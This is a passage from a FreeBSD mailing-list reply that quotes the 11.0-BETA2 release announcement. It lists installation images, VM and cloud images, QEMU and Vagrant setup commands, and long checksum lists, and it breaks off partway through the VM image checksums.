rsgnU8iRvHrStYNigjjTX+XXyc8Ivs/Xxr540sk90OuXnd0HxV+pYo20PelT0xh6DfyM hQAQ== X-Gm-Message-State: AEkoouuqO+bhowLPDUOY5onTZwHgDDl5o3pZV2yonWOxM+8zVGmv6yM28PaQx0QZLgwVzA== X-Received: by 10.66.63.100 with SMTP id f4mr37257575pas.101.1469518327079; Tue, 26 Jul 2016 00:32:07 -0700 (PDT) Received: from ?IPv6:2001:44b8:31ae:7b01:f985:3c4b:2a0c:8bea? (2001-44b8-31ae-7b01-f985-3c4b-2a0c-8bea.static.ipv6.internode.on.net. [2001:44b8:31ae:7b01:f985:3c4b:2a0c:8bea]) by smtp.gmail.com with ESMTPSA id c125sm45179016pfc.40.2016.07.26.00.32.04 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Tue, 26 Jul 2016 00:32:06 -0700 (PDT) Sender: Kubilay Kocak Reply-To: koobs@FreeBSD.org Subject: Re: FreeBSD 11.0-BETA2 Now Available References: <20160724192523.GA94659@FreeBSD.org> To: Glen Barber , freebsd-current@FreeBSD.org, freebsd-stable@FreeBSD.org, freebsd-snapshots@FreeBSD.org Cc: FreeBSD Release Engineering Team From: Kubilay Kocak Message-ID: <69898164-f373-6774-7305-128a1e5da3c4@FreeBSD.org> Date: Tue, 26 Jul 2016 17:32:02 +1000 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Thunderbird/49.0a2 MIME-Version: 1.0 In-Reply-To: <20160724192523.GA94659@FreeBSD.org> Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 07:32:08 -0000 On 25/07/2016 5:25 AM, Glen Barber wrote: > The second BETA build of the 11.0-RELEASE release cycle is now > available. 11.0-BETA2 version added to Bugzilla for bug reports/regression/etc Bugs marked 11.0-BETA1 that are unresolved [1] should be updated to 11.0-BETA2 [1] https://bugs.freebsd.org/bugzilla/buglist.cgi?bug_status=New&bug_status=Open&bug_status=In%20Progress&list_id=127434&product=Base%20System&query_format=advanced&version=11.0-BETA1 > Installation images are available for: > > o 11.0-BETA2 amd64 GENERIC > o 11.0-BETA2 i386 GENERIC > o 11.0-BETA2 powerpc GENERIC > o 11.0-BETA2 powerpc64 GENERIC64 > o 11.0-BETA2 sparc64 GENERIC > o 11.0-BETA2 armv6 BANANAPI > o 11.0-BETA2 armv6 BEAGLEBONE > o 11.0-BETA2 armv6 CUBIEBOARD > o 11.0-BETA2 armv6 CUBIEBOARD2 > o 11.0-BETA2 armv6 CUBOX-HUMMINGBOARD > o 11.0-BETA2 armv6 GUMSTIX > o 11.0-BETA2 armv6 RPI-B > o 11.0-BETA2 armv6 RPI2 > o 11.0-BETA2 armv6 PANDABOARD > o 11.0-BETA2 armv6 WANDBOARD > o 11.0-BETA2 aarch64 GENERIC > > Note regarding arm/armv6 images: For convenience for those without > console access to the system, a freebsd user with a password of > freebsd is available by default for ssh(1) access. Additionally, > the root user password is set to root, which it is strongly > recommended to change the password for both users after gaining > access to the system. > > Installer images and memory stick images are available here: > > ftp://ftp.freebsd.org/pub/FreeBSD/releases/ISO-IMAGES/11.0/ > > The image checksums follow at the end of this e-mail. > > If you notice problems you can report them through the Bugzilla PR > system or on the -stable mailing list. > > If you would like to use SVN to do a source based update of an existing > system, use the "stable/11" branch. > > A summary of changes since 11.0-BETA1 includes: > > o Several build-/toolchain-related fixes. > > o WITNESS and INVARIANTS have been disabled on powerpc/powerpc64 and > arm/armv6 architectures. > > o freebsd-update(8) has been updated to allow '*-dbg' distribution sets. > > o ctld(8) no longer exits when reloading the configuration with invalid > initiator-portal clauses. > > o GENERIC-NODEBUG kernel configurations have been removed. > > o The callout code has been updated to avoid a system panic with TCP > timers. > > o Several other changes. > > A list of changes since 10.0-RELEASE are available on the stable/11 > release notes: > > https://www.freebsd.org/relnotes/11-STABLE/relnotes/article.html > > Please note, the release notes page is not yet complete, and will be > updated on an ongoing basis as the 11.0-RELEASE cycle progresses. > > === Virtual Machine Disk Images === > > VM disk images are available for the amd64 and i386 architectures. > Disk images may be downloaded from the following URL (or any of the > FreeBSD FTP mirrors): > > ftp://ftp.freebsd.org/pub/FreeBSD/releases/VM-IMAGES/11.0-BETA2/ > > The partition layout is: > > ~ 16 kB - freebsd-boot GPT partition type (bootfs GPT label) > ~ 1 GB - freebsd-swap GPT partition type (swapfs GPT label) > ~ 20 GB - freebsd-ufs GPT partition type (rootfs GPT label) > > The disk images are available in QCOW2, VHD, VMDK, and raw disk image > formats. The image download size is approximately 135 MB and 165 MB > respectively (amd64/i386), decompressing to a 21 GB sparse image. > > Note regarding arm64/aarch64 virtual machine images: a modified QEMU EFI > loader file is needed for qemu-system-aarch64 to be able to boot the > virtual machine images. See this page for more information: > > https://wiki.freebsd.org/arm64/QEMU > > To boot the VM image, run: > > % qemu-system-aarch64 -m 4096M -cpu cortex-a57 -M virt \ > -bios QEMU_EFI.fd -serial telnet::4444,server -nographic \ > -drive if=none,file=VMDISK,id=hd0 \ > -device virtio-blk-device,drive=hd0 \ > -device virtio-net-device,netdev=net0 \ > -netdev user,id=net0 > > Be sure to replace "VMDISK" with the path to the virtual machine image. > > === Amazon EC2 AMI Images === > > FreeBSD/amd64 EC2 AMIs are available in the following regions: > > us-east-1 region: ami-684bc37f > us-west-1 region: ami-2592d345 > us-west-2 region: ami-210cc041 > sa-east-1 region: ami-511b8f3d > eu-west-1 region: ami-3d12704e > eu-central-1 region: ami-92f80cfd > ap-northeast-1 region: ami-355ba354 > ap-northeast-2 region: ami-edef2583 > ap-southeast-1 region: ami-789d421b > ap-southeast-2 region: ami-1a81ab79 > > === Vagrant Images === > > FreeBSD/amd64 images are available on the Hashicorp Atlas site, and can > be installed by running: > > % vagrant init freebsd/FreeBSD-11.0-BETA2 > % vagrant up > > Note to freebsd-update(8) consumers: An EN for earlier FreeBSD releases > is required before upgrading to 11.0-BETA2 will work properly, so it is > advised to wait until the ENs are published before attempting an upgrade > via freebsd-update(8). > > == ISO CHECKSUMS == > > o 11.0-BETA2 amd64 GENERIC: > SHA512 (FreeBSD-11.0-BETA2-amd64-bootonly.iso) = a9bb4b98001e783c71b7d1f046a5dacf2cf992f5d3baa7dcba0ea0aaaafdb126421f43509757a794562661200ed6abb8a72c671d7968c2b9f64c660e10f9a094 > SHA512 (FreeBSD-11.0-BETA2-amd64-bootonly.iso.xz) = 92d6faa8b1c3c19fae79d42c3c39e01b9e0a41bf726c6c8218c545f057a26b18440dcae530326881781918165f0197f28a1c634bee00352627fd0e0ad6c6f497 > SHA512 (FreeBSD-11.0-BETA2-amd64-disc1.iso) = f0287f3062ecf22d88f2d24e7093009a6036165d1b05bc6824407494d4452b4868635874b4c921f9f62621b797e11876348c29d9f3be21bec800145d5250e7dc > SHA512 (FreeBSD-11.0-BETA2-amd64-disc1.iso.xz) = 58615d59cc5af2032cffb588281d2bbe8e7cffe05585fc58f3ec5eb2f084866e91a87a05b15185a1fbacabbb062176a27ecc4dd7bae24190cf4cee7c0828002b > SHA512 (FreeBSD-11.0-BETA2-amd64-dvd1.iso) = 6af2edc64620c4e91d6dbdcea8f532118f2a12934523fc5e331a7a86ee374c71703b0d82f9964b8d28eb77918d8b1fb0f2690de8a040ce2066fc36917431fc38 > SHA512 (FreeBSD-11.0-BETA2-amd64-dvd1.iso.xz) = 468764188290a2206bac5138f62ca6779de1fb634807a6b220841979df0eb1053bbb96ad8a4b36fda2770e6c75e7c78103eb72ed4533c91da3672954d57b9f58 > SHA512 (FreeBSD-11.0-BETA2-amd64-memstick.img) = a5cec97933e621db45df9c7471fe237daae00c4147d084363e6625f25ce109086029c7c78ee122edcaeb9d228a9d24a81bf54b0155c66dd614331466eb4d20dd > SHA512 (FreeBSD-11.0-BETA2-amd64-memstick.img.xz) = 17f560214a861cd3d4eb8c065465d3201f71b2b52bf5546e5b91b145779d0458e9eb8d412eb57da6f27af72391071637289436084b20a5c18208544f73719dec > SHA512 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img) = ea620830b801ae97f5300974eccee4fc72a883e81b0ccd26767f0ead478aa9e0003125fb05fb96044e99574fe4ef957a5cdfb7d0fb0511068ea007bb46b6595f > SHA512 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img.xz) = b1e9bcb1f6d8be187724f2889014d9b832ce693b4e91c9f1e03aa683e68f2c10947957222d969f3761437e77d3d1509c31134c1d4e085fce6d36c58df843d290 > > SHA256 (FreeBSD-11.0-BETA2-amd64-bootonly.iso) = 2d5059befc71ab713b5a1e91eae97e179f075cdf9d65e164951382c986ae3408 > SHA256 (FreeBSD-11.0-BETA2-amd64-bootonly.iso.xz) = c5fee5793e83169a0e72978905ba2d468351022391fa7dcd448746e4be1403bb > SHA256 (FreeBSD-11.0-BETA2-amd64-disc1.iso) = 74490ca260ca544edb8956d72cf23b82650b7578569945a6a690a9a346cebfd7 > SHA256 (FreeBSD-11.0-BETA2-amd64-disc1.iso.xz) = 21e5b7beae939cb83443f8a15b41dcca4e218b2070cf99bf34442e3bc8f36022 > SHA256 (FreeBSD-11.0-BETA2-amd64-dvd1.iso) = e925286eabccc95f4139709a3de3f4d812257eefed5151d983885afc2e0055c0 > SHA256 (FreeBSD-11.0-BETA2-amd64-dvd1.iso.xz) = 1f8108cde27c60e4ee47c2c769dec4a6117664b3c74c2a297b8725fb4385975f > SHA256 (FreeBSD-11.0-BETA2-amd64-memstick.img) = 2e68b5a4fbcf724fc3be731bf70b5f67ba4f1c150ed013b96d16617801701c35 > SHA256 (FreeBSD-11.0-BETA2-amd64-memstick.img.xz) = 7baadb1155ece581c7d0ba0eb4109566767c8afe0b8e4cb34e8459500b1b43ba > SHA256 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img) = 3ddd0ae09bda3d65419da370cf596a96e6f2d8dbe6af2448e076c8d36032ba11 > SHA256 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img.xz) = 338db28352e4f7599dc64f52ea093da7e76b7db763828948755a4ad346e117de > > > o 11.0-BETA2 i386 GENERIC: > SHA512 (FreeBSD-11.0-BETA2-i386-bootonly.iso) = 81b2c5111da60ef8373ad8b176a4f99b5a6ccca883e40ad6f2d99e60bc62004817b714dc39d2954be70f794ee32c09be0a675d85da199e316e5a836a43408301 > SHA512 (FreeBSD-11.0-BETA2-i386-bootonly.iso.xz) = 0256763cf9fe3b0477c3e8dc512eba39040109705bf5e64949014a647ff6f8428da3977be6fe4e6161d7ec0fc3b3568730a62302c59e8b86826686f574aad7c0 > SHA512 (FreeBSD-11.0-BETA2-i386-disc1.iso) = 4ed4104fe02ba6f629d86748374674d38a54877ac5a2fde3d34d6767d6b43e8ee0f33c2015d4ac172435dec55f1c50a712ff2a84ab5bdaa539788b0aa7adb876 > SHA512 (FreeBSD-11.0-BETA2-i386-disc1.iso.xz) = f44ab1f42fee18a681119b6e31539383dbe336b00d5eeaa228a9530108146151a46228f132ae017913c11c7647bde667cd028883e90d20056bf127cb2bd99843 > SHA512 (FreeBSD-11.0-BETA2-i386-dvd1.iso) = 17e80925a31314d06b10f58d27152df2077a0e08eb493aa7af151ac53c2402a77d249ca081b911704d27115ba84fe974de7ab32a508659ebecfb2b9bb426c38a > SHA512 (FreeBSD-11.0-BETA2-i386-dvd1.iso.xz) = a881a9d545d107098c800dc2c4885e2a62e842ab77423aa82655da81e04fe940cbdb2b84e0b50c2e7d370d2d60189a28179fc57938ebe0b05e8116361e0a65bf > SHA512 (FreeBSD-11.0-BETA2-i386-memstick.img) = 286bcf577c2329d20b82202ed955113e0dca8483f65915cf5260b57d403ca83b35fa8328f2100b07c0801ddc97ecfb8b659cd2c88b43cf47c356a713d9cc2309 > SHA512 (FreeBSD-11.0-BETA2-i386-memstick.img.xz) = 1d3b709d79e3a147a006e339c42290a1a2bfbffed932f8406f0b2bb88827f4f9307618a35b537559632373ed8443fe8865c7f5c373a073edef527f10f9d15528 > SHA512 (FreeBSD-11.0-BETA2-i386-mini-memstick.img) = 3eded6d13a6953b634876b6dae00e53b8bfca7a8a96328959420bb530a10c9ab4cc69a8507defdd51accc867ce138a9b537cbe14bf24852e1ef1b681240d1431 > SHA512 (FreeBSD-11.0-BETA2-i386-mini-memstick.img.xz) = 51ea56db2ec344679605a128b022819fa516b1ac4b53280b912014166ffbc429dcc09585a30f8bd4a607a9ac203e0697be7cfc23f757adb7f806877d983429c0 > > SHA256 (FreeBSD-11.0-BETA2-i386-bootonly.iso) = 5816c18aa103811f905d4bb8bac4444fd8803dfe0b48d8f94f55cd3f0467250e > SHA256 (FreeBSD-11.0-BETA2-i386-bootonly.iso.xz) = 57db61c8448115307e3798927e799244afac9cb7f63a9a779f535eab68c2793f > SHA256 (FreeBSD-11.0-BETA2-i386-disc1.iso) = 89d84f54489caa430c157e1293db37bd3dab88096159a135cdc0652ec02fb479 > SHA256 (FreeBSD-11.0-BETA2-i386-disc1.iso.xz) = a630a027ce5217ef6e5dded767ca895eb9bf15c7e0040a32676ef921043385fb > SHA256 (FreeBSD-11.0-BETA2-i386-dvd1.iso) = 1d229cf7ba465e40d66e23213ffe113a83dfd0a46f38f9c61d7782c3f19cd9df > SHA256 (FreeBSD-11.0-BETA2-i386-dvd1.iso.xz) = 9e89c21bf730b114b40b4d88c2eb040e3026a62cbcf8d88c0e14df19232d3a7c > SHA256 (FreeBSD-11.0-BETA2-i386-memstick.img) = 4175261432d2ad4f6b62ff05b598814681ccbc095c09470f01867d1eb4d86597 > SHA256 (FreeBSD-11.0-BETA2-i386-memstick.img.xz) = db37a9bf82e04c82abbc36dd6961dffb4258299d373044bb0660520e7d999844 > SHA256 (FreeBSD-11.0-BETA2-i386-mini-memstick.img) = 063040d6a291c2b291f8a7c6de119e7d15686825810e40d710322e2b6f21c9e5 > SHA256 (FreeBSD-11.0-BETA2-i386-mini-memstick.img.xz) = 7404e4db9a730e2b2acc7a921e001507691d8680a17fc29fa647fc7631fe1137 > > > o 11.0-BETA2 powerpc GENERIC: > SHA512 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso) = 96546a0e7aa19d3425ffee27cf11b62c5dbceff84de7f50310d97a82ef9bea1ece02465d91d309998848bc63b8d678084b4d7142bd4d9a493cef7b6491b1fc62 > SHA512 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso.xz) = 35de9a1e9c41e36b66a306595a8d70318c5c6d9fbf92dcbe04471a8acd473c71bcab41fbc9f9911867593633ad1f510d8f777d0a3ab219984fe3fd69f461dec3 > SHA512 (FreeBSD-11.0-BETA2-powerpc-disc1.iso) = c5276dd2a49e3d86aa3d72151ee2ea9d35d2eb76ff0ee5200cbb2ec3cdd4b3e0e11087ee9fd3e5bf68929ecf8aa4ee11011ffc9044b3d847fe7f17184f3b1ae4 > SHA512 (FreeBSD-11.0-BETA2-powerpc-disc1.iso.xz) = 6bb56412b0d2b3885bc4362a47448a3285787d17630b1184b9593d4600e5dd24c7b1209ceb067f927f78273eedaaec2d5ddab6b85cfb0beb63b469dfdf59f4af > SHA512 (FreeBSD-11.0-BETA2-powerpc-memstick.img) = 1def389bc29f546dba33f82f94e3abd582dd983829137cc2b7bd7e363ce346289376f09984bfca0ce516e2e5616ecf53cbe6c14a859fde294fefe0d114dacdda > SHA512 (FreeBSD-11.0-BETA2-powerpc-memstick.img.xz) = 5006e3a2b558fb8abf527c545387de0a7a48df24f8063293f5d40d45df7caaa98d908beaa82902be0a67998d81b3a2931fa7435507b8fd2ad20cdb5df31383e3 > SHA512 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img) = 10d4604b466093bc10472393c1f61069f7e8565cdc653b192edcaa99f111bb727e5a4c4a9d54bca1c2f1d5a6344d7aa5b07dde32a58457f6589b02bfd25c1885 > SHA512 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img.xz) = 633e84bba4bd8fad0c0daab16e8ae7ab1b16060c8300718d41dacfc5009589c4237551c655637399c68beb327c04a70ad7382da6c9c0aa2a36d206fc679fa25e > > SHA256 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso) = 4197c3d7f02106f0144e338e541fec669e35146cfdfdb2fa0433cd868734d805 > SHA256 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso.xz) = 2edc68eed8d1f233b6609f2ab1d665bfbabc53b4e56aecae68e8004b818f7d4c > SHA256 (FreeBSD-11.0-BETA2-powerpc-disc1.iso) = eaa59f998c9fb8e9801f92c93d493534743792b6695ae8713aa2e05a62d691df > SHA256 (FreeBSD-11.0-BETA2-powerpc-disc1.iso.xz) = e4da8f91188f00806ff4f0948a6a40c2e71e639c84a44e9c961c8c94fbd56daf > SHA256 (FreeBSD-11.0-BETA2-powerpc-memstick.img) = 107e63252fb0e429361b634857c1db80995a5d77b07f15ea1dd5d97e1320fee2 > SHA256 (FreeBSD-11.0-BETA2-powerpc-memstick.img.xz) = 0020a7a994d50f8363e08041418d8f9f0b24293b77cb3aae58f9681873fa1097 > SHA256 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img) = 25b912b0e9f3d9a8743525d52e5d06798840afa27b7ac2c35bfc2483e606e62c > SHA256 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img.xz) = 5ce0cda82565a56ad8a85968d9c959a060787fa4fb542858fe4a32e8a863dd6e > > > o 11.0-BETA2 powerpc64 GENERIC64: > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso) = fab016ee466def73566f09410d82557c1bd4b581785798dd463efc25446f2278031593256c626abfc635b899127e712ef2c4deb1fe45d901c02beb5ce0f75574 > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso.xz) = 467e7c832fbea323f9bc234b0d2fb2f79719380d1d5f1e2c129c8c51222d981efd89adfddd2eac870602037ddb69510be95cec01112dfdbc03f69fad3c1078d2 > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso) = f6d77ef45e740ad3f8bb83b5d00d39af2af2cf00353f4ebfb1da43d8185681da91720f2746b5b7bb8cd48de8ae2afa7eb10c889eecda4bb7892ebcd22c0bbb3b > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso.xz) = 45f504cabb6b6920d8b441e7324957de1d8e58130a7fe4ec3eb1118744d2cc22974f4ac7945406b3dcf0342ec9113246641fe389416cd64e01be85c9da2f3b86 > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img) = 2d707fd7edf4427348a5e359b8768552b324139b101593a5a5d1940fe5cf794d9ca472a1a31ded6bb63a836c0651ebe0594fb22998e5f2fa62ffedbf647d54ce > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img.xz) = aea7ec565b2b9da762357479a029a8c5a2b5b41a6b8b16bd3d75ea4a4a7eae7093b1672ea7fbb82d8a2cd9ef217166ca1bb018498b61631332305afd83a14f05 > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img) = 48c17c7ea03da81cda41584784b338fa5b5a4576f79164ad2aed7108594db3c22ba3582515225f8d8273c94d40bf33ebcaa562b17357d859ae902e62b43c6736 > SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img.xz) = 46a8394cc3016d943bd6730b4dc0476b01af430f3b4c9f776a9f6b44d8265001ca5d1368a192fa004a4f3c7b549f53435d07a9fbf9c4c46310cc9f1024513709 > > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso) = 315d10cb26dbe9d7f282b83db1b54fb49408a00584a5f9f2a8943af0deda4ec7 > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso.xz) = e4ee97b0ddc495a043dc6a6ef81f2e257de7711ba6ccd2c241917bbc17be7c41 > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso) = 5f124e3a69fce2ed0276cc765b9e42639b601e8a2b73d1b6e484b47747ff93d8 > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso.xz) = e19b9c87f12dacbe0bac4f9ee6038af4bc45c30c3c7eacc2d4f1a4a85658f0d3 > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img) = 859fc65391d9129c8d448792e5eceae9c29da9e6b1c95cd74fc4716653440cfe > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img.xz) = f9933a1a838a7f3c06e281fbeb95456b374c6f47346f84e6d0ee728f9ee66341 > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img) = f6f2ffbe7c70fd30be0280be9dbff6916ea655f4a03d70e3cf9de8f3c2364aa1 > SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img.xz) = 12b7c45106ff861d96f9aa173c33ee8aa21ab6be7ac990766e35ade3e16cc6cc > > > o 11.0-BETA2 sparc64 GENERIC: > SHA512 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso) = 00d7c917e567ac90515be927b8ac849987e7d62a28c00d26aacaa423b45d81b94cb233099d42c34887b8e2e3ac240fb86f29cc2452e720e9f37786a9c52898ba > SHA512 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso.xz) = e3e91cf851553f68893663907d806d306a4904c456b7946eb7c87f2b8acc2ff53af6020bc23d5c83368772127eea889b1c60c2a54658778dbfaace87827f961e > SHA512 (FreeBSD-11.0-BETA2-sparc64-disc1.iso) = ff6a943419f57cda170dd0b5b4e50cb9c0e16a106626ba49b2852c45d69227b58e06a3c0cd000596ff7fe6911fee539fea8cfecebbcf8f30a91ea6d0895623ef > SHA512 (FreeBSD-11.0-BETA2-sparc64-disc1.iso.xz) = d4cdd336eb82c3865c7cf4d613d14ba26a7a283dd44a12afcbc4ad75d86f91bd5c5e7e07cc14fb6c1ac50eda6e7906a096694164bca85228b13709f25568aafd > > SHA256 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso) = 16d851a982fd490d8098cb2a005cd44a3295bdec9faf2c464b2a47769e7b2c38 > SHA256 (FreeBSD-11.0-BETA2-sparc64-bootonly.iso.xz) = 8808e4a6651538b7b7f5cb7dd67574bd9e7a84dfd5976459b6b308a30331795e > SHA256 (FreeBSD-11.0-BETA2-sparc64-disc1.iso) = 23ed7fe9ca4d27735d2db06b97746ea746fbbc9ae35a8739537c8f5f4ed5dcfe > SHA256 (FreeBSD-11.0-BETA2-sparc64-disc1.iso.xz) = 893649606d063d94968d737b65f125e34b42bc4baf812f09666b2250a463afe9 > > > o 11.0-BETA2 armv6 BANANAPI: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-BANANAPI.img.xz) = 8655a994bc485269586e4dc37cbc84d130b0e16bb98c2be920e1226f9c96b1228350cf9b17d3198cf7b8551311d13caccc0df8a95f14080a76a2697794cdea64 > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-BANANAPI.img.xz) = fc57f634f74d10cf1c4e447b96d49157b322ea957986bf3254ec286030e99530 > > > o 11.0-BETA2 armv6 BEAGLEBONE: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-BEAGLEBONE.img.xz) = ffac1d1b43c9dbbe19db791cb56c7878e80f729dc48ec09c40841af365573f31b17dfbeceb21c808bd321994230c203b9961e3dd4475353afb16249a54ae285c > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-BEAGLEBONE.img.xz) = bcd56dff27da74937f8928ed1693daf4ab3e0434445dd1b0cbab620c4897d733 > > > o 11.0-BETA2 armv6 CUBIEBOARD: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD.img.xz) = 385ebcd1d4a9f5232492134897d49cd9394c0fbb492ca1c44a1fd98dd1ee9bdb76e598fe22e1197b924a8fc565c742fc69dcb96619f15831515985d412289a1a > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD.img.xz) = 64aadaea9ebe03e4cf58394327ce062a46d2b1107775f36cecb184401e4a09d3 > > > o 11.0-BETA2 armv6 CUBIEBOARD2: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD2.img.xz) = 828b49a4241f5301c7776b2c8b5a13bc72a1f1214c7bbcf49533899bca1af554e9adda034cb66267c2fcc9e639bad37433b35b84e64ddee0aeb6564785c0fc11 > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-CUBIEBOARD2.img.xz) = 6dc1e900131338a9cf0ae386d595b9d0b1076a8621da07015cd8e371391e4030 > > > o 11.0-BETA2 armv6 CUBOX-HUMMINGBOARD: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-CUBOX-HUMMINGBOARD.img.xz) = 978017ba75fde5003ccff1754b45144bb889d3ea42ef59706162cec31dd161395ec3b8ec54ef296a4b082fb8e7561c1aae7470d92ebf2bd83b7bad9436979bf1 > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-CUBOX-HUMMINGBOARD.img.xz) = 1e5a6bc1602cd9a32d205a2309e626efb14bf9595eeb9a475201d3679535b930 > > > o 11.0-BETA2 armv6 GUMSTIX: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-GUMSTIX.img.xz) = 87887d64ee2e00fb80727f060511539a5f7365421592726deff7484da2482fc1ea03492dda2bbd4f8ecace98dfeb01bca163c097ef03ae45d385271ad90cccd0 > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-GUMSTIX.img.xz) = f0ec539b4a970b47bc8c9ac87724cc2534a3690c9927a8f427b43cd5fc84910a > > > o 11.0-BETA2 armv6 RPI-B: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-RPI-B.img.xz) = d80288fa91e84f94a1c2051b15e4fede023d8d58c7b2da5d6459129adc5b60313ae73a41ba57030170bf7a9a5c8dc506bab71b6dbeb9eada7bd0c058353fd4b0 > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-RPI-B.img.xz) = ba24a8e1d728849f728779ae5c26ac46cbd21b046549408961d594c03e47dae7 > > > o 11.0-BETA2 armv6 RPI2: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-RPI2.img.xz) = 569871af879ef131f3e45cee283b97e6c8955444730167e1cea30648bde2aa63e822ef3380379b91354b2c02b701b92b141bff1a32610e28abfd456d689bbe1b > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-RPI2.img.xz) = b34912f54e775bd8b2a2b111ce193c1cb0b75d8039c08c4b8c509e76a1029cef > > > o 11.0-BETA2 armv6 PANDABOARD: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-PANDABOARD.img.xz) = 002b3038d2e95fe6b629e0f1ad502e3454eb92516f7fcadc30316b7849ee475fb2d0a104297adda8c60078b2f228fe91928b2174faa75ec7705fd21d581a58f1 > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-PANDABOARD.img.xz) = a787c9e96937db162c53cfceff5d4842cf347fa597501bd10cb2f440610864a4 > > > o 11.0-BETA2 armv6 WANDBOARD: > SHA512 (FreeBSD-11.0-BETA2-arm-armv6-WANDBOARD.img.xz) = b2e43b2b5d7a045d8a512fb5e37da59bc58c9c253bb185848da260e73e255c83277f006702dd26e4983681cbde0280cc87e552f1d5dcf9a5368e9d8d413b0698 > > SHA256 (FreeBSD-11.0-BETA2-arm-armv6-WANDBOARD.img.xz) = a6e0b0a2b0e4383d05f67b9b23272db07e3e27ef43e3a6e2174116389f8026e6 > > > o 11.0-BETA2 aarch64 GENERIC: > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img) = b7f478509415b30367f176b43c81da7650bfcec19877c3e6c52c53227bc500f89b0838e9355acc9a62abab614d0126013524d65a720c60615836328c4cc7b015 > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img.xz) = 7308f33dcda71eda20aeb998515c28c75c1d713534ee2acd7f23f7e56f187330ae0d1233364f42216676543730956d795ec56b489bb8734d5c7c72a057e3f931 > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img) = 53709016431f49035b578970d9a928daa8dd2ea0559060c67e17a8e8123b7ed07758cb31565f590ac98778836a86dcd8c93eb496d159064fb51a8550307f9a83 > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img.xz) = 20d1082a00254f17d71fbb5180f4ec212cafab53095ebd461f7a6b29481968c83f0c43907dca2033f903797866dc0ae88493cf55b7e0423dae439f5ced245535 > > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img) = 574a974f408acd8a6b0e7c8d6314606f3ddcbbe5ce9fe8ef9fec9fdfd21f4e1f > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-memstick.img.xz) = 62142f61d87e6a72bf122fef724ef512f95a50eba13f871cf868e309a69f1ffd > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img) = b80e2d039febc148dc29cb238ba2869301cecdd04eb504d47996b368cf0b1edb > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64-mini-memstick.img.xz) = 50f8896250a5bba449ff38f647e4e61b25e50135fba1c4f677ad5511b51c221d > > > == VM IMAGE CHECKSUMS == > > o 11.0-BETA2 amd64: > SHA512 (FreeBSD-11.0-BETA2-amd64.qcow2.xz) = 244e417810d1c87d91fef1addfa37c4ecb0112c2be4e12a86ae2dc6c65dd0ab2bb1d25fd16e318c581cecb99331b6fc7cdc6b0a5684c9bb3c824ea4d6be00536 > SHA512 (FreeBSD-11.0-BETA2-amd64.raw.xz) = 